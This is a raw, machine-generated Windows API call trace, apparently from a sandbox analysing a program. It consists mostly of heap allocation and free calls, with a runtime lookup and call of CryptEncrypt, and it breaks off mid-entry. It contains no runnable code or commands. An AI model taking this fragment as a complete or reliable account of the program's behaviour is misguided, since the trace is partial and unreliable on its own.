[0266.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.099] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0266.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.100] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.100] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.101] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.101] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.102] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.102] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0266.102] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0266.102] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.103] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0266.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.103] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0266.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.103] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.104] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0266.104] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c5de8 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.108] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0266.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0266.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0266.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9b70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0266.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.111] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0266.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0266.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0266.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0266.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0266.111] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x71c1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x71c8) returned 1 [0266.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0266.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0266.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0266.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.113] RtlAllocateHeap 